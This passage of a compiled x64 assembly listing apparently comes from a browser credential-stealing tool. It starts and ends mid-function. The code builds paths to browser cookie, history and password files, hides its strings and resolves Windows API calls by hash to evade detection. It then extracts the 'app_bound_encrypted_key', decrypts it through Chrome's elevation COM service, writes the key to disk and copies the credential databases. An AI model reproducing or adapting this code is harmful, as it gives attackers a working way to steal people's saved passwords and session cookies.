; Line 493
	lea	rcx, QWORD PTR passwordPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv664[rsp], rax
	lea	rcx, QWORD PTR passwordPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR passwordPath$[rsp+rax]
	mov	QWORD PTR tv662[rsp], rax
	mov	r8, QWORD PTR tv664[rsp]
	mov	rdx, QWORD PTR tv662[rsp]
	lea	rcx, QWORD PTR passwordFilename$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 495
	lea	rax, QWORD PTR orCookiesPath$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 496
	lea	rax, QWORD PTR orHistoryPath$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 497
	lea	rax, QWORD PTR orPasswordPath$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 498
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR orCookiesPath$[rsp]
	lea	rcx, QWORD PTR pathEdge$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 499
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR orHistoryPath$[rsp]
	lea	rcx, QWORD PTR pathEdge$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 500
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR orPasswordPath$[rsp]
	lea	rcx, QWORD PTR pathEdge$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 502
	mov	BYTE PTR network$[rsp], 92		; 0000005cH
	mov	BYTE PTR network$[rsp+1], 78		; 0000004eH
	mov	BYTE PTR network$[rsp+2], 101		; 00000065H
	mov	BYTE PTR network$[rsp+3], 116		; 00000074H
	mov	BYTE PTR network$[rsp+4], 119		; 00000077H
	mov	BYTE PTR network$[rsp+5], 111		; 0000006fH
	mov	BYTE PTR network$[rsp+6], 114		; 00000072H
	mov	BYTE PTR network$[rsp+7], 107		; 0000006bH
	mov	BYTE PTR network$[rsp+8], 0
; Line 504
	lea	rcx, QWORD PTR orCookiesPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv698[rsp], rax
	lea	rcx, QWORD PTR orCookiesPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR orCookiesPath$[rsp+rax]
	mov	QWORD PTR tv696[rsp], rax
	mov	r8, QWORD PTR tv698[rsp]
	mov	rdx, QWORD PTR tv696[rsp]
	lea	rcx, QWORD PTR network$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 505
	lea	rcx, QWORD PTR orCookiesPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv743[rsp], rax
	lea	rcx, QWORD PTR orCookiesPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR orCookiesPath$[rsp+rax]
	mov	QWORD PTR tv741[rsp], rax
	mov	r8, QWORD PTR tv743[rsp]
	mov	rdx, QWORD PTR tv741[rsp]
	lea	rcx, QWORD PTR cookiesFilename$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 506
	lea	rcx, QWORD PTR orHistoryPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv756[rsp], rax
	lea	rcx, QWORD PTR orHistoryPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR orHistoryPath$[rsp+rax]
	mov	QWORD PTR tv754[rsp], rax
	mov	r8, QWORD PTR tv756[rsp]
	mov	rdx, QWORD PTR tv754[rsp]
	lea	rcx, QWORD PTR historyFilename$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 507
	lea	rcx, QWORD PTR orPasswordPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv769[rsp], rax
	lea	rcx, QWORD PTR orPasswordPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR orPasswordPath$[rsp+rax]
	mov	QWORD PTR tv767[rsp], rax
	mov	r8, QWORD PTR tv769[rsp]
	mov	rdx, QWORD PTR tv767[rsp]
	lea	rcx, QWORD PTR passwordFilename$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 518
	mov	DWORD PTR hashCreateFileA$[rsp], 896765632 ; 35738ec0H
; Line 519
	mov	r8d, 896765632				; 35738ec0H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCreateFileA$[rsp], rax
; Line 520
	cmp	QWORD PTR pCreateFileA$[rsp], 0
	jne	SHORT $LN10@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN10@DecryptKey:
; Line 521
	mov	rax, QWORD PTR pCreateFileA$[rsp]
	mov	QWORD PTR tv783[rsp], rax
	mov	QWORD PTR [rsp+48], 0
	mov	DWORD PTR [rsp+40], 128			; 00000080H
	mov	DWORD PTR [rsp+32], 3
	xor	r9d, r9d
	xor	r8d, r8d
	mov	edx, -2147483648			; 80000000H
	lea	rcx, QWORD PTR path$[rsp]
	call	QWORD PTR tv783[rsp]
	mov	QWORD PTR hFile$[rsp], rax
; Line 522
	cmp	QWORD PTR hFile$[rsp], 0
	jne	SHORT $LN11@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN11@DecryptKey:
; Line 525
	mov	DWORD PTR hashGetFileSize$[rsp], -1940020856 ; 8c5da188H
; Line 526
	mov	r8d, -1940020856			; 8c5da188H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pGetFileSize$[rsp], rax
; Line 527
	cmp	QWORD PTR pGetFileSize$[rsp], 0
	jne	SHORT $LN12@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN12@DecryptKey:
; Line 528
	mov	rax, QWORD PTR pGetFileSize$[rsp]
	mov	QWORD PTR tv794[rsp], rax
	xor	edx, edx
	mov	rcx, QWORD PTR hFile$[rsp]
	call	QWORD PTR tv794[rsp]
	mov	DWORD PTR dwFileSize$[rsp], eax
; Line 529
	cmp	DWORD PTR dwFileSize$[rsp], 0
	jne	SHORT $LN13@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN13@DecryptKey:
; Line 531
	mov	QWORD PTR fileBuf$[rsp], 0
; Line 532
	mov	eax, DWORD PTR dwFileSize$[rsp]
	inc	eax
	mov	eax, eax
	lea	rdx, QWORD PTR fileBuf$[rsp]
	mov	ecx, eax
	call	?AllocMemory@@YA_N_KPEAPEAX@Z		; AllocMemory
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN14@DecryptKey
; Line 533
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN14@DecryptKey:
; Line 543
	mov	DWORD PTR hashReadFile$[rsp], -1576683562 ; a205b7d6H
; Line 544
	mov	r8d, -1576683562			; a205b7d6H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pReadFile$[rsp], rax
; Line 545
	cmp	QWORD PTR pReadFile$[rsp], 0
	jne	SHORT $LN15@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN15@DecryptKey:
; Line 546
	mov	rax, QWORD PTR pReadFile$[rsp]
	mov	QWORD PTR tv815[rsp], rax
	mov	QWORD PTR [rsp+32], 0
	xor	r9d, r9d
	mov	r8d, DWORD PTR dwFileSize$[rsp]
	mov	rdx, QWORD PTR fileBuf$[rsp]
	mov	rcx, QWORD PTR hFile$[rsp]
	call	QWORD PTR tv815[rsp]
	test	eax, eax
	jne	SHORT $LN16@DecryptKey
; Line 547
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN16@DecryptKey:
; Line 551
	mov	DWORD PTR hashCloseHandle$[rsp], 1729908677 ; 671c4fc5H
; Line 552
	mov	r8d, 1729908677				; 671c4fc5H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCloseHandle$[rsp], rax
; Line 553
	cmp	QWORD PTR pCloseHandle$[rsp], 0
	jne	SHORT $LN17@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN17@DecryptKey:
; Line 555
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv825[rsp], rax
	mov	rcx, QWORD PTR hFile$[rsp]
	call	QWORD PTR tv825[rsp]
; Line 557
	mov	BYTE PTR patternKey$[rsp], 97		; 00000061H
	mov	BYTE PTR patternKey$[rsp+1], 112	; 00000070H
	mov	BYTE PTR patternKey$[rsp+2], 112	; 00000070H
	mov	BYTE PTR patternKey$[rsp+3], 95		; 0000005fH
	mov	BYTE PTR patternKey$[rsp+4], 98		; 00000062H
	mov	BYTE PTR patternKey$[rsp+5], 111	; 0000006fH
	mov	BYTE PTR patternKey$[rsp+6], 117	; 00000075H
	mov	BYTE PTR patternKey$[rsp+7], 110	; 0000006eH
	mov	BYTE PTR patternKey$[rsp+8], 100	; 00000064H
	mov	BYTE PTR patternKey$[rsp+9], 95		; 0000005fH
	mov	BYTE PTR patternKey$[rsp+10], 101	; 00000065H
	mov	BYTE PTR patternKey$[rsp+11], 110	; 0000006eH
	mov	BYTE PTR patternKey$[rsp+12], 99	; 00000063H
	mov	BYTE PTR patternKey$[rsp+13], 114	; 00000072H
	mov	BYTE PTR patternKey$[rsp+14], 121	; 00000079H
	mov	BYTE PTR patternKey$[rsp+15], 112	; 00000070H
	mov	BYTE PTR patternKey$[rsp+16], 116	; 00000074H
	mov	BYTE PTR patternKey$[rsp+17], 101	; 00000065H
	mov	BYTE PTR patternKey$[rsp+18], 100	; 00000064H
	mov	BYTE PTR patternKey$[rsp+19], 95	; 0000005fH
	mov	BYTE PTR patternKey$[rsp+20], 107	; 0000006bH
	mov	BYTE PTR patternKey$[rsp+21], 101	; 00000065H
	mov	BYTE PTR patternKey$[rsp+22], 121	; 00000079H
	mov	BYTE PTR patternKey$[rsp+23], 34	; 00000022H
	mov	BYTE PTR patternKey$[rsp+24], 58	; 0000003aH
	mov	BYTE PTR patternKey$[rsp+25], 34	; 00000022H
	mov	BYTE PTR patternKey$[rsp+26], 0
; Line 558
	mov	QWORD PTR keyPointer$[rsp], 0
; Line 559
	lea	rcx, QWORD PTR patternKey$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	QWORD PTR tv899[rsp], rax
	mov	rax, QWORD PTR fileBuf$[rsp]
	mov	QWORD PTR tv897[rsp], rax
	lea	r9, QWORD PTR keyPointer$[rsp]
	mov	r8, QWORD PTR tv899[rsp]
	lea	rdx, QWORD PTR patternKey$[rsp]
	mov	rcx, QWORD PTR tv897[rsp]
	call	?FindPatternA@@YA_NPEBD0_KPEAPEAD@Z	; FindPatternA
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN18@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN18@DecryptKey:
; Line 560
	lea	rcx, QWORD PTR patternKey$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	rcx, QWORD PTR keyPointer$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR keyPointer$[rsp], rax
; Line 561
	mov	DWORD PTR sizeKeyB64$[rsp], 0
; Line 562
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@DecryptKey
$LN2@DecryptKey:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@DecryptKey:
; Line 563
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR keyPointer$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	cmp	eax, 34					; 00000022H
	jne	SHORT $LN19@DecryptKey
; Line 564
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR keyPointer$[rsp]
	mov	BYTE PTR [rcx+rax], 0
; Line 565
	jmp	SHORT $LN3@DecryptKey
$LN19@DecryptKey:
; Line 567
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
; Line 568
	mov	eax, DWORD PTR sizeKeyB64$[rsp]
	inc	eax
	mov	DWORD PTR sizeKeyB64$[rsp], eax
; Line 569
	jmp	SHORT $LN2@DecryptKey
$LN3@DecryptKey:
; Line 576
	mov	DWORD PTR hashCoInitializeEx$[rsp], -731484482 ; d4666ebeH
; Line 577
	mov	r8d, -731484482				; d4666ebeH
	mov	rdx, QWORD PTR hOle32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCoInitializeEx$[rsp], rax
; Line 578
	cmp	QWORD PTR pCoInitializeEx$[rsp], 0
	jne	SHORT $LN20@DecryptKey
; Line 579
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN20@DecryptKey:
; Line 582
	mov	rax, QWORD PTR pCoInitializeEx$[rsp]
	mov	QWORD PTR tv925[rsp], rax
	mov	edx, 2
	xor	ecx, ecx
	call	QWORD PTR tv925[rsp]
	mov	DWORD PTR hr$[rsp], eax
; Line 583
	cmp	DWORD PTR hr$[rsp], 0
	jge	SHORT $LN21@DecryptKey
; Line 584
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN21@DecryptKey:
; Line 588
	mov	DWORD PTR hashCoUninitialize$[rsp], 691362315 ; 29355a0bH
; Line 589
	mov	r8d, 691362315				; 29355a0bH
	mov	rdx, QWORD PTR hOle32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCoUninitialize$[rsp], rax
; Line 590
	cmp	QWORD PTR pCoUninitialize$[rsp], 0
	jne	SHORT $LN22@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN22@DecryptKey:
; Line 597
	mov	DWORD PTR hashCoCreateInstance$[rsp], -1213256403 ; b7af2d2dH
; Line 598
	mov	r8d, -1213256403			; b7af2d2dH
	mov	rdx, QWORD PTR hOle32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCoCreateInstance$[rsp], rax
; Line 599
	cmp	QWORD PTR pCoCreateInstance$[rsp], 0
	jne	SHORT $LN23@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN23@DecryptKey:
; Line 600
	mov	rax, QWORD PTR pCoCreateInstance$[rsp]
	mov	QWORD PTR tv944[rsp], rax
	lea	rax, QWORD PTR pElevator$[rsp]
	mov	QWORD PTR [rsp+32], rax
	lea	r9, QWORD PTR ChromeIID2$[rsp]
	mov	r8d, 4
	xor	edx, edx
	lea	rcx, QWORD PTR ChromeCLSID$[rsp]
	call	QWORD PTR tv944[rsp]
	mov	DWORD PTR hr$[rsp], eax
; Line 608
	cmp	DWORD PTR hr$[rsp], 0
	jge	SHORT $LN24@DecryptKey
; Line 609
	mov	rax, QWORD PTR pCoCreateInstance$[rsp]
	mov	QWORD PTR tv953[rsp], rax
	lea	rax, QWORD PTR pElevator$[rsp]
	mov	QWORD PTR [rsp+32], rax
	lea	r9, QWORD PTR ChromeIID$[rsp]
	mov	r8d, 4
	xor	edx, edx
	lea	rcx, QWORD PTR ChromeCLSID$[rsp]
	call	QWORD PTR tv953[rsp]
	mov	DWORD PTR hr$[rsp], eax
$LN24@DecryptKey:
; Line 618
	cmp	DWORD PTR hr$[rsp], 0
	jge	SHORT $LN25@DecryptKey
; Line 619
	call	QWORD PTR pCoUninitialize$[rsp]
; Line 620
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN25@DecryptKey:
; Line 634
	mov	DWORD PTR hashCoSetProxyBlanket$[rsp], 1618607058 ; 6079fbd2H
; Line 635
	mov	r8d, 1618607058				; 6079fbd2H
	mov	rdx, QWORD PTR hOle32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCoSetProxyBlanket$[rsp], rax
; Line 636
	cmp	QWORD PTR pCoSetProxyBlanket$[rsp], 0
	jne	SHORT $LN26@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN26@DecryptKey:
; Line 637
	mov	rax, QWORD PTR pCoSetProxyBlanket$[rsp]
	mov	QWORD PTR tv970[rsp], rax
	mov	DWORD PTR [rsp+56], 64			; 00000040H
	mov	QWORD PTR [rsp+48], 0
	mov	DWORD PTR [rsp+40], 3
	mov	DWORD PTR [rsp+32], 6
	mov	r9, -1
	mov	r8d, -1					; ffffffffH
	mov	edx, -1					; ffffffffH
	mov	rcx, QWORD PTR pElevator$[rsp]
	call	QWORD PTR tv970[rsp]
	mov	DWORD PTR hr$[rsp], eax
; Line 648
	mov	QWORD PTR decryptedDataBSTR$[rsp], 0
; Line 649
	mov	DWORD PTR dwLastError$[rsp], 0
; Line 650
	mov	DWORD PTR length$[rsp], 0
; Line 651
	lea	rdx, QWORD PTR length$[rsp]
	mov	rcx, QWORD PTR keyPointer$[rsp]
	call	?Base64Decode@@YAPEADPEBDAEAH@Z		; Base64Decode
	mov	QWORD PTR encKey$[rsp], rax
; Line 652
	mov	BYTE PTR sOleAut32$[rsp], 79		; 0000004fH
	mov	BYTE PTR sOleAut32$[rsp+1], 108		; 0000006cH
	mov	BYTE PTR sOleAut32$[rsp+2], 101		; 00000065H
	mov	BYTE PTR sOleAut32$[rsp+3], 65		; 00000041H
	mov	BYTE PTR sOleAut32$[rsp+4], 117		; 00000075H
	mov	BYTE PTR sOleAut32$[rsp+5], 116		; 00000074H
	mov	BYTE PTR sOleAut32$[rsp+6], 51		; 00000033H
	mov	BYTE PTR sOleAut32$[rsp+7], 50		; 00000032H
	mov	BYTE PTR sOleAut32$[rsp+8], 46		; 0000002eH
	mov	BYTE PTR sOleAut32$[rsp+9], 100		; 00000064H
	mov	BYTE PTR sOleAut32$[rsp+10], 108	; 0000006cH
	mov	BYTE PTR sOleAut32$[rsp+11], 108	; 0000006cH
	mov	BYTE PTR sOleAut32$[rsp+12], 0
; Line 653
	mov	rax, QWORD PTR pLoadLibraryA$[rsp]
	mov	QWORD PTR tv977[rsp], rax
	lea	rcx, QWORD PTR sOleAut32$[rsp]
	call	QWORD PTR tv977[rsp]
	mov	QWORD PTR hOleAut32$[rsp], rax
; Line 654
	cmp	QWORD PTR hOleAut32$[rsp], 0
	jne	SHORT $LN27@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN27@DecryptKey:
; Line 657
	mov	DWORD PTR hashSysAllocStringByteLen$[rsp], -985302606 ; c54579b2H
; Line 658
	mov	r8d, -985302606				; c54579b2H
	mov	rdx, QWORD PTR hOleAut32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSysAllocStringByteLen$[rsp], rax
; Line 659
	cmp	QWORD PTR pSysAllocStringByteLen$[rsp], 0
	jne	SHORT $LN28@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN28@DecryptKey:
; Line 662
	mov	DWORD PTR hashSysStringByteLen$[rsp], 1739000677 ; 67a70b65H
; Line 663
	mov	r8d, 1739000677				; 67a70b65H
	mov	rdx, QWORD PTR hOleAut32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSysStringByteLen$[rsp], rax
; Line 664
	cmp	QWORD PTR pSysStringByteLen$[rsp], 0
	jne	SHORT $LN29@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN29@DecryptKey:
; Line 667
	mov	DWORD PTR hashSysFreeString$[rsp], 2140232812 ; 7f915c6cH
; Line 668
	mov	r8d, 2140232812				; 7f915c6cH
	mov	rdx, QWORD PTR hOleAut32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSysFreeString$[rsp], rax
; Line 669
	cmp	QWORD PTR pSysFreeString$[rsp], 0
	jne	SHORT $LN30@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN30@DecryptKey:
; Line 670
	mov	rax, QWORD PTR pSysAllocStringByteLen$[rsp]
	mov	QWORD PTR tv1064[rsp], rax
	mov	eax, DWORD PTR length$[rsp]
	sub	eax, 4
	mov	rcx, QWORD PTR encKey$[rsp]
	add	rcx, 4
	mov	edx, eax
	call	QWORD PTR tv1064[rsp]
	mov	QWORD PTR bstrEncKey$[rsp], rax
; Line 671
	mov	rax, QWORD PTR pElevator$[rsp]
	mov	rax, QWORD PTR [rax]
	mov	rax, QWORD PTR [rax+40]
	mov	QWORD PTR tv1073[rsp], rax
	lea	r9, QWORD PTR dwLastError$[rsp]
	lea	r8, QWORD PTR decryptedDataBSTR$[rsp]
	mov	rdx, QWORD PTR bstrEncKey$[rsp]
	mov	rcx, QWORD PTR pElevator$[rsp]
	call	QWORD PTR tv1073[rsp]
	mov	DWORD PTR hr$[rsp], eax
; Line 672
	cmp	QWORD PTR bstrEncKey$[rsp], 0
	je	SHORT $LN31@DecryptKey
; Line 673
	mov	rax, QWORD PTR pSysFreeString$[rsp]
	mov	QWORD PTR tv1077[rsp], rax
	mov	rcx, QWORD PTR bstrEncKey$[rsp]
	call	QWORD PTR tv1077[rsp]
	npad	1
$LN31@DecryptKey:
; Line 676
	cmp	DWORD PTR hr$[rsp], 0
	jge	SHORT $LN32@DecryptKey
; Line 677
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
; Line 678
	jmp	$LN33@DecryptKey
$LN32@DecryptKey:
; Line 687
	mov	DWORD PTR hashWriteFile$6[rsp], -339353823 ; ebc5df21H
; Line 688
	mov	r8d, -339353823				; ebc5df21H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pWriteFile$3[rsp], rax
; Line 689
	cmp	QWORD PTR pWriteFile$3[rsp], 0
	jne	SHORT $LN34@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN34@DecryptKey:
; Line 690
	mov	rax, QWORD PTR pCreateFileA$[rsp]
	mov	QWORD PTR tv1093[rsp], rax
	mov	QWORD PTR [rsp+48], 0
	mov	DWORD PTR [rsp+40], 128			; 00000080H
	mov	DWORD PTR [rsp+32], 2
	xor	r9d, r9d
	xor	r8d, r8d
	mov	edx, 1073741824				; 40000000H
	lea	rcx, QWORD PTR keyPath$[rsp]
	call	QWORD PTR tv1093[rsp]
	mov	QWORD PTR hFile$2[rsp], rax
; Line 691
	mov	rax, QWORD PTR pWriteFile$3[rsp]
	mov	QWORD PTR tv1109[rsp], rax
	mov	rax, QWORD PTR pSysStringByteLen$[rsp]
	mov	QWORD PTR tv1100[rsp], rax
	mov	rcx, QWORD PTR decryptedDataBSTR$[rsp]
	call	QWORD PTR tv1100[rsp]
	mov	DWORD PTR tv1107[rsp], eax
	mov	rax, QWORD PTR decryptedDataBSTR$[rsp]
	mov	QWORD PTR tv1105[rsp], rax
	mov	QWORD PTR [rsp+32], 0
	xor	r9d, r9d
	mov	r8d, DWORD PTR tv1107[rsp]
	mov	rdx, QWORD PTR tv1105[rsp]
	mov	rcx, QWORD PTR hFile$2[rsp]
	call	QWORD PTR tv1109[rsp]
; Line 692
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv1112[rsp], rax
	mov	rcx, QWORD PTR hFile$2[rsp]
	call	QWORD PTR tv1112[rsp]
; Line 693
	mov	DWORD PTR hashCopyFileA$7[rsp], 528854519 ; 1f85adf7H
; Line 699
	mov	r8d, 528854519				; 1f85adf7H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCopyFileA$5[rsp], rax
; Line 700
	cmp	QWORD PTR pCopyFileA$5[rsp], 0
	jne	SHORT $LN35@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN35@DecryptKey:
; Line 702
	mov	DWORD PTR hashSleep$4[rsp], 1231028136	; 495fffa8H
; Line 704
	mov	r8d, 1231028136				; 495fffa8H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSleep$8[rsp], rax
; Line 706
	lea	rdx, QWORD PTR cookiesPath$[rsp]
	lea	rcx, QWORD PTR orCookiesPath$[rsp]
	call	?CreateCopyFile@@YA_NPEAD0@Z		; CreateCopyFile
	movzx	eax, al
; Line 708
	lea	rdx, QWORD PTR historyPath$[rsp]
	lea	rcx, QWORD PTR orHistoryPath$[rsp]
	call	?CreateCopyFile@@YA_NPEAD0@Z		; CreateCopyFile
	movzx	eax, al
; Line 710
	lea	rdx, QWORD PTR passwordPath$[rsp]
